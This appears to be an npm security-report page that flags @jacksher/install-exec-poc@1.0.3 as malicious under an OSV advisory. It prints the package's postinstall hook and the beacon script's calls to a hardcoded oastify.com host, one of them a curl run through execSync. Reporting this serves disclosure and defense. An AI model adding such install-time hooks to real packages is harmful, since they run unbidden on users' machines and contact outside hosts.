Loading npm security reports…
OpenSSF/OSV advisory MAL-2026-13972 confirms this npm version as malicious. package.json declares `postinstall: node beacon.js`. On every `npm install`, beacon.js unconditionally performs a DNS lookup, an HTTPS GET to `https://jobzq12beck611luewfsf8yyepkg86wv.oastify.com/postinstall-fired`, and `child_process.execSync('curl -s https://<same-host>/ci', {stdio:'ignore'})` against the same hardcoded oastify.com (Burp Collaborator) subdomain...
This report applies to @jacksher/install-exec-poc@1.0.3.
See version security history for other recorded verdicts.
Evidence last updated: .
Source advisory published: .
This report uses published external intelligence. The advisory does not provide a separate source-code analysis for each listed version.